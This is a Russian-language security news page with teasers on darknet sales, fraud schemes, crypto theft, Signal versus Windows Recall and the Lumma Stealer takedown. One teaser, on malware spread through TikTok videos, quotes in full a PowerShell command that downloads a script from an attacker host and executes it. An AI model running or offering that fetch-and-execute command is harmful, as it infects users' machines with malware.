UfoLabs - Лаборатория нло

Дарквеб 2024: эксплойты по цене машины, логи — как хлеб в магазине

Доступ в вашу сеть уже у кого-то есть. И стоит недорого. Компания F6 представила результаты масштабного исследования даркнета, в рамках которого были проанализированы теневые площадки, специализирующиеся на продаже доступа к корпоративным сетям, базам данных, вредоносному ПО и другим нелегальным сервисам. Самыми дешёвыми лотами оказались учётные записи...

2,6 млрд налогов и ноль видимости: казино из игорных зон пишут Дурову

Казино не виноваты, но под подозрением: Telegram идёт по широкой метке. Ассоциация операторов индустрии развлечений и событийного туризма (АИРИС), объединяющая легальные игорные зоны России, направила письмо Павлу Дурову с просьбой вывести их Telegram-каналы из теневого бана. Копия обращения имеется в распоряжении РБК . Операторы легальных игорных зон...

Сын — дроппер, мама — платит: суд не интересует, кто что “не знал”

1,2 миллиарда рублей уже взысканы с дропперов: иски продолжаются. Граждане, пострадавшие от мошеннических схем, могут обратиться в суд и потребовать возврата незаконно полученных средств с дроппера в рамках гражданского дела. Об этом сообщает Официальный телеграм-канал УБК МВД России со ссылкой на данные Генеральной прокуратуры. По информации ведомства...

Чтобы связаться с ЦРУ — введите пароль в строку поиска сайта про джедаев

То, что казалось фан-сайтом, оказалось глобальной сетью агентуры США. Первое раскрытие этой схемы произошло более десяти лет назад — в Иране. Тогда местные спецслужбы обнаружили сеть сайтов и начали охоту на подозрительных лиц, которая впоследствии привела к массовым арестам и убийствам агентов ЦРУ в Китае в 2011–2012 годах. По данным расследования Yahoo News, утечка из Ирана сыграла...

Открываешь Zenmap — запускаешь Bumblebee. Добро пожаловать на новый уровень социальной инженерии

Идеальный план мошенников: отключить официальный сайт, залить фейк и ждать, пока жертва приползёт сама. Кибермошенники расширили масштабы атаки Bumblebee , нацеленной на пользователей популярного ПО: создали поддельные сайты, имитирующие легитимные проекты с открытым исходным кодом, и продвигают их через поисковую оптимизацию. Ранее на этой неделе специалисты...

Cetus Protocol обокрали на $223 млн, и теперь они умоляют хакера отдать хотя бы часть — за амнистию и чай

Хакеры ушли с деньгами, пользователи с вопросами. Виновата дыра в коде, но будет ли наказание? Децентрализованная биржа Cetus Protocol стала жертвой крупнейшего ограбления в истории криптовалютной индустрии, потеряв 223 миллиона долларов США в цифровых активах. Проект объявил о готовности заключить сделку с хакерами , обещая прекратить все правовые...

Забудьте о вирусах в письмах — теперь ими заражаются через вертикальные видео в TikTok

Полмиллиона просмотров и тысячи заражённых устройств. Как хакерам это удаётся? Вредоносная цепочка запускается, когда пользователь, следуя «инструкции», нажимает Windows + R и запускает PowerShell с командой вроде iwr hxxps://allaivo.me/spotify -UseBasicParsing | iex. Этот скрипт: создаёт скрытые директории в APPDATA и LOCALAPPDATA; добавляет их в исключения Windows...

Recall всё видит, но Signal нашёл способ исчезнуть с радаров — буквально

Теперь ваши переписки не попадут в индекс ИИ-инструмента от Microsoft. Мессенджер Signal сообщил, что в последней версии для Windows теперь по умолчанию запрещено делать скриншоты интерфейса приложения. Причина — новая функция Windows 11 под названием Recall. Этот инструмент на базе ИИ, который делает снимки экрана, индексирует и сохраняет почти всё, что делает...

Письмо от «шефа», фальшивая переписка и счёт на услуги — как российские компании теряют деньги, не заметив подмены

Новая волна атак на бизнес в России. «Лаборатория Касперского» зафиксировала новый виток целевых атак на российский бизнес с использованием схемы подмены электронной переписки. Мошенники рассылают фальшивые письма, в которых представляются подрядчиками и ссылаются на якобы достигнутые договорённости с генеральным директором жертвы. Цель — убедить бухгалтерию...

Мощный удар по Lumma Stealer: скоординированная операция отправила хакеров в «длительный отпуск»

Те, кто считал себя вне досягаемости, внезапно потеряли контроль. В первой половине мая 2025 года международная операция, направленная на разрушение инфраструктуры Lumma Stealer — одного из самых массово используемых вредоносных сервисов категории «инфостилер», привела к масштабным результатам. Благодаря скоординированным действиям сразу нескольких IT-компаний и...

Полезные ссылки